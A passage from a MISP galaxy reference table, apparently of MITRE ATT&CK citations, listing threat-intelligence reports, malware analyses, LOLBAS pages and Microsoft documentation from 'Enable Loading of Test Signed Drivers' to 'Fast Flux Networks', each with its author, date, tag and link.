https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction

Microsoft TESTSIGNING Feb 2021

Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Microsoft TESTSIGNING Feb 2021"

Table 13501. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option

Microsoft Disable DCOM

Microsoft. (n.d.). Enable or Disable DCOM. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft Disable DCOM"

Table 13502. Table References

Links

https://technet.microsoft.com/library/cc771387.aspx

Microsoft Disable Macros

Microsoft. (n.d.). Enable or disable macros in Office files. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Microsoft Disable Macros"

Table 13503. Table References

Links

https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6

Microsoft Remote

Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.

The tag is: misp-galaxy:references="Microsoft Remote"

Table 13504. Table References

Links

https://technet.microsoft.com/en-us/library/cc754820.aspx

PCMag DoubleExtension

PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="PCMag DoubleExtension"

Table 13505. Table References

Links

https://www.pcmag.com/encyclopedia/term/double-extension

FireEye Periscope March 2018

FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="FireEye Periscope March 2018"

Table 13506. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

NCCIC AR-17-20045 February 2017

NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.

The tag is: misp-galaxy:references="NCCIC AR-17-20045 February 2017"

Table 13507. Table References

Links

https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

ESET Sednit Part 1

ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.

The tag is: misp-galaxy:references="ESET Sednit Part 1"

Table 13508. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf

ESET Sednit Part 2

ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.

The tag is: misp-galaxy:references="ESET Sednit Part 2"

Table 13509. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

ESET Sednit Part 3

ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.

The tag is: misp-galaxy:references="ESET Sednit Part 3"

Table 13510. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

Google Ensuring Your Information is Safe

Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Ensuring Your Information is Safe"

Table 13511. Table References

Links

https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html

Fortinet Blog November 13 2018

Fortinet Blog. (2018, November 13). Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Fortinet Blog November 13 2018"

Table 13512. Table References

Links

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

Splunk DarkGate January 17 2024

Splunk Threat Research Team. (2024, January 17). Enter The Gates: An Analysis of the DarkGate AutoIt Loader. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="Splunk DarkGate January 17 2024"

Table 13513. Table References

Links

https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html

Microsoft EnumDeviceDrivers

Microsoft. (2021, October 12). EnumDeviceDrivers function (psapi.h). Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Microsoft EnumDeviceDrivers"

Table 13514. Table References

Links

https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers

EK Clueless Agents

Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.

The tag is: misp-galaxy:references="EK Clueless Agents"

Table 13515. Table References

Links

https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf

Deloitte Environment Awareness

Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.

The tag is: misp-galaxy:references="Deloitte Environment Awareness"

Table 13516. Table References

Links

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

MSDN Environment Property

Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016.

The tag is: misp-galaxy:references="MSDN Environment Property"

Table 13517. Table References

Links

https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx

Microsoft Environment Property

Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.

The tag is: misp-galaxy:references="Microsoft Environment Property"

Table 13518. Table References

Links

https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN

Kaspersky Equation QA

Kaspersky Lab’s Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.

The tag is: misp-galaxy:references="Kaspersky Equation QA"

Table 13519. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

erase_cmd_cisco

Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.

The tag is: misp-galaxy:references="erase_cmd_cisco"

Table 13520. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463

Container Escape

0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Container Escape"

Table 13521. Table References

Links

https://0xn3va.gitbook.io/cheat-sheets/container/escaping

Microsoft Esentutl

Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.

The tag is: misp-galaxy:references="Microsoft Esentutl"

Table 13522. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)

LOLBAS Esentutl

LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.

The tag is: misp-galaxy:references="LOLBAS Esentutl"

Table 13523. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Esentutl/

ESET Twitter Ida Pro Nov 2021

Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="ESET Twitter Ida Pro Nov 2021"

Table 13524. Table References

Links

https://twitter.com/ESETresearch/status/1458438155149922312

ESET PowerPool Code October 2020

ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020.

The tag is: misp-galaxy:references="ESET PowerPool Code October 2020"

Table 13525. Table References

Links

https://twitter.com/ESETresearch/status/1311762215490461696

ESET FinFisher Jan 2018

Kafka, F. (2018, January). ESET’s Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.

The tag is: misp-galaxy:references="ESET FinFisher Jan 2018"

Table 13526. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

ESET Trickbot Oct 2020

Boutin, J. (2020, October 12). ESET takes part in global operation to disrupt Trickbot. Retrieved March 15, 2021.

The tag is: misp-galaxy:references="ESET Trickbot Oct 2020"

Table 13527. Table References

Links

https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/

WeLiveSecurity April 19 2022

Jean-Ian Boutin, Tomáš Procházka. (2022, April 19). ESET takes part in global operation to disrupt Zloader botnets | WeLiveSecurity. Retrieved May 10, 2023.

The tag is: misp-galaxy:references="WeLiveSecurity April 19 2022"

Table 13528. Table References

Links

https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

Riskiq Remcos Jan 2018

Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Riskiq Remcos Jan 2018"

Table 13529. Table References

Links

https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/

EventLog_Core_Technologies

Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="EventLog_Core_Technologies"

Table 13530. Table References

Links

https://www.coretechnologies.com/blog/windows-services/eventlog/

ISACA Malware Tricks

Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="ISACA Malware Tricks"

Table 13531. Table References

Links

https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes

ThreatStream Evasion Analysis

Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="ThreatStream Evasion Analysis"

Table 13532. Table References

Links

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Anomali Evasive Maneuvers July 2015

Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.

The tag is: misp-galaxy:references="Anomali Evasive Maneuvers July 2015"

Table 13533. Table References

Links

https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Unit42 OilRig Playbook 2023

Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="Unit42 OilRig Playbook 2023"

Table 13534. Table References

Links

https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens

Microsoft EventLog.Clear

Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Microsoft EventLog.Clear"

Table 13535. Table References

Links

https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx

evt_log_tampering

svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="evt_log_tampering"

Table 13536. Table References

Links

https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c

Microsoft ETW May 2018

Microsoft. (2018, May 30). Event Tracing. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="Microsoft ETW May 2018"

Table 13537. Table References

Links

https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal

Eventvwr.exe - LOLBAS Project

LOLBAS. (2018, November 1). Eventvwr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Eventvwr.exe - LOLBAS Project"

Table 13538. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/

Secure Ideas SMB Relay

Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.

The tag is: misp-galaxy:references="Secure Ideas SMB Relay"

Table 13539. Table References

Links

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

CSV Excel Macro Injection

Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="CSV Excel Macro Injection"

Table 13540. Table References

Links

https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/

Avertium callback phishing

Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="Avertium callback phishing"

Table 13541. Table References

Links

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing

Intezer Aurora Sept 2017

Rosenberg, J. (2017, September 20). Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.

The tag is: misp-galaxy:references="Intezer Aurora Sept 2017"

Table 13542. Table References

Links

http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

Cyphort EvilBunny Dec 2014

Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.

The tag is: misp-galaxy:references="Cyphort EvilBunny Dec 2014"

Table 13543. Table References

Links

https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

Evil Clippy May 2019

Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="Evil Clippy May 2019"

Table 13544. Table References

Links

https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/

Evilginx 2 July 2018

Gretzky, K.. (2018, July 26). Evilginx 2 - Next Generation of Phishing 2FA Tokens. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="Evilginx 2 July 2018"

Table 13545. Table References

Links

https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/

Evilginx Sources & Methods December 2023

Matthew Conway. (2023, December 14). Evilginx Phishing Proxy. Retrieved January 3, 2023.

The tag is: misp-galaxy:references="Evilginx Sources & Methods December 2023"

Table 13546. Table References

Links

https://sourcesmethods.com/evilginx-phishing-proxy/

SentinelOne EvilQuest Ransomware Spyware 2020

Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="SentinelOne EvilQuest Ransomware Spyware 2020"

Table 13547. Table References

Links

https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

Cisco Synful Knock Evolution

Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Synful Knock Evolution"

Table 13548. Table References

Links

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

Securelist JSWorm

Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Securelist JSWorm"

Table 13549. Table References

Links

https://securelist.com/evolution-of-jsworm-ransomware/102428/

S2 Grupo TrickBot June 2017

Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.

The tag is: misp-galaxy:references="S2 Grupo TrickBot June 2017"

Table 13550. Table References

Links

https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf

Unit 42 Valak July 2020

Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.

The tag is: misp-galaxy:references="Unit 42 Valak July 2020"

Table 13551. Table References

Links

https://unit42.paloaltonetworks.com/valak-evolution/

Microsoft - Device Registration

Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="Microsoft - Device Registration"

Table 13552. Table References

Links

https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa

Amnesty OAuth Phishing Attacks, August 2019

Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Amnesty OAuth Phishing Attacks, August 2019"

Table 13553. Table References

Links

https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/

RSAC 2015 Abu Dhabi Stefano Maccaglia

Maccaglia, S. (2015, November 4). Evolving Threats: dissection of a CyberEspionage attack. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="RSAC 2015 Abu Dhabi Stefano Maccaglia"

Table 13554. Table References

Links

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.11.04_Evolving_Threats/cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack.pdf

MSTIC. (2021, November 16). Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021. Retrieved January 12, 2023.

The tag is: misp-galaxy:references="Microsoft Iranian Threat Actor Trends November 2021"

Table 13555. Table References

Links

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021

Palo Alto Unit 42 VBA Infostealer 2014

Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Palo Alto Unit 42 VBA Infostealer 2014"

Table 13556. Table References

Links

https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/

Trend Micro Black Basta May 2022

Gonzalez, I., Chavez I., et al. (2022, May 9). Examining the Black Basta Ransomware’s Infection Routine. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Trend Micro Black Basta May 2022"

Table 13557. Table References

Links

https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

Mandiant Glyer APT 2010

Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Mandiant Glyer APT 2010"

Table 13558. Table References

Links

https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf

Excel.exe - LOLBAS Project

LOLBAS. (2019, July 19). Excel.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Excel.exe - LOLBAS Project"

Table 13559. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/

Microsoft Tim McMichael Exchange Mail Forwarding 2

McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Microsoft Tim McMichael Exchange Mail Forwarding 2"

Table 13560. Table References

Links

https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

DFIR Phosphorus November 2021

DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.

The tag is: misp-galaxy:references="DFIR Phosphorus November 2021"

Table 13561. Table References

Links

https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/

ExchangePowerShell Module

Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.

The tag is: misp-galaxy:references="ExchangePowerShell Module"

Table 13562. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes

ESET Exchange Mar 2021

Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.

The tag is: misp-galaxy:references="ESET Exchange Mar 2021"

Table 13563. Table References

Links

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

Executable Installers are Vulnerable

Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Executable Installers are Vulnerable"

Table 13564. Table References

Links

https://seclists.org/fulldisclosure/2015/Dec/34

Seclists Kanthak 7zip Installer

Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved March 10, 2017.

The tag is: misp-galaxy:references="Seclists Kanthak 7zip Installer"

Table 13565. Table References

Links

http://seclists.org/fulldisclosure/2015/Dec/34

Redxorblue Remote Template Injection

Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.

The tag is: misp-galaxy:references="Redxorblue Remote Template Injection"

Table 13566. Table References

Links

http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html

Microsoft PSfromCsharp APR 2014

Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Microsoft PSfromCsharp APR 2014"

Table 13567. Table References

Links

https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

PAM Creds

Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020.

The tag is: misp-galaxy:references="PAM Creds"

Table 13568. Table References

Links

https://x-c3ll.github.io/posts/PAM-backdoor-DNS/

Microsoft Expand Utility

Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.

The tag is: misp-galaxy:references="Microsoft Expand Utility"

Table 13569. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand

LOLBAS Expand

LOLBAS. (n.d.). Expand.exe. Retrieved February 19, 2019.

The tag is: misp-galaxy:references="LOLBAS Expand"

Table 13570. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Expand/

Mandiant CVE-2023-3519 Exploitation

James Nugent, Foti Castelan, Doug Bienstock, Justin Moore, Josh Murchie. (2023, July 21). Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE-2023-3519). Retrieved July 24, 2023.

The tag is: misp-galaxy:references="Mandiant CVE-2023-3519 Exploitation"

Table 13571. Table References

Links

https://www.mandiant.com/resources/blog/citrix-zero-day-espionage

Exploit Database

Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Exploit Database"

Table 13572. Table References

Links

https://www.exploit-db.com/

Rhino Labs Cloud Image Backdoor Technique Sept 2019

Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Rhino Labs Cloud Image Backdoor Technique Sept 2019"

Table 13573. Table References

Links

https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/

Azure AD PTA Vulnerabilities

Dr. Nestori Syynimaa. (2022, September 20). Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD PTA Vulnerabilities"

Table 13574. Table References

Links

https://o365blog.com/post/pta/

Exploiting Smartphone USB

Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="Exploiting Smartphone USB"

Table 13575. Table References

Links

https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf

versprite xpc vpn

VerSprite. (2018, January 24). Exploiting VyprVPN for MacOS. Retrieved April 20, 2022.

The tag is: misp-galaxy:references="versprite xpc vpn"

Table 13576. Table References

Links

https://versprite.com/blog/exploiting-vyprvpn-for-macos/

Explorer.exe - LOLBAS Project

LOLBAS. (2020, June 24). Explorer.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Explorer.exe - LOLBAS Project"

Table 13577. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Explorer/

Trend Micro Emotet Jan 2019

Trend Micro. (2019, January 16). Exploring Emotet’s Activities . Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Trend Micro Emotet Jan 2019"

Table 13578. Table References

Links

https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf

SecurityTrails Google Hacking

Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="SecurityTrails Google Hacking"

Table 13579. Table References

Links

https://securitytrails.com/blog/google-hacking-techniques

Medium SSL Cert

Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Medium SSL Cert"

Table 13580. Table References

Links

https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

Google EXOTIC LILY March 2022

Stolyarov, V. (2022, March 17). Exposing initial access broker with ties to Conti. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Google EXOTIC LILY March 2022"

Table 13581. Table References

Links

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

Microsoft POLONIUM June 2022

Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.

The tag is: misp-galaxy:references="Microsoft POLONIUM June 2022"

Table 13582. Table References

Links

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

External to DA, the OS X Way

Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="External to DA, the OS X Way"

Table 13583. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Extexport.exe - LOLBAS Project

LOLBAS. (2018, May 25). Extexport.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Extexport.exe - LOLBAS Project"

Table 13584. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extexport/

Extrac32.exe - LOLBAS Project

LOLBAS. (2018, May 25). Extrac32.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Extrac32.exe - LOLBAS Project"

Table 13585. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extrac32/

Journey into IR ZeroAccess NTFS EA

Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="Journey into IR ZeroAccess NTFS EA"

Table 13586. Table References

Links

http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html

Bizeul 2014

Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="Bizeul 2014"

Table 13587. Table References

Links

https://airbus-cyber-security.com/the-eye-of-the-tiger/

ThreatPost Social Media Phishing

O’Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ThreatPost Social Media Phishing"

Table 13588. Table References

Links

https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

SentinelLabs reversing run-only applescripts 2021

Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="SentinelLabs reversing run-only applescripts 2021"

Table 13589. Table References

Links

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Sentinel Labs

Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Sentinel Labs"

Table 13590. Table References

Links

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

ESET OceanLotus Mar 2019

Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.

The tag is: misp-galaxy:references="ESET OceanLotus Mar 2019"

Table 13591. Table References

Links

https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/

ZScaler BitB 2020

ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="ZScaler BitB 2020"

Table 13592. Table References

Links

https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials

FalconFeedsio Tweet October 9 2023

FalconFeedsio. (2023, October 9). FalconFeedsio Tweet October 9 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="FalconFeedsio Tweet October 9 2023"

Table 13593. Table References

Links

https://twitter.com/FalconFeedsio/status/1711251161289003465

FalconFeedsio Tweet September 28 2023

FalconFeedsio. (2023, September 28). FalconFeedsio Tweet September 28 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="FalconFeedsio Tweet September 28 2023"

Table 13594. Table References

Links

https://twitter.com/FalconFeedsio/status/1707330146842169831

falconoverwatch_blackcat_attack

Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.

The tag is: misp-galaxy:references="falconoverwatch_blackcat_attack"

Table 13595. Table References

Links

https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/

CitizenLab Tropic Trooper Aug 2018

Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019.

The tag is: misp-galaxy:references="CitizenLab Tropic Trooper Aug 2018"

Table 13596. Table References

Links

https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/

CISA AA20-239A BeagleBoyz August 2020

DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea’s BeagleBoyz Robbing Banks. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CISA AA20-239A BeagleBoyz August 2020"

Table 13597. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-239a

Fast Flux - Welivesecurity

Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. Retrieved March 11, 2020.

The tag is: misp-galaxy:references="Fast Flux - Welivesecurity"

Table 13598. Table References

Links

https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/

MehtaFastFluxPt1

Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.

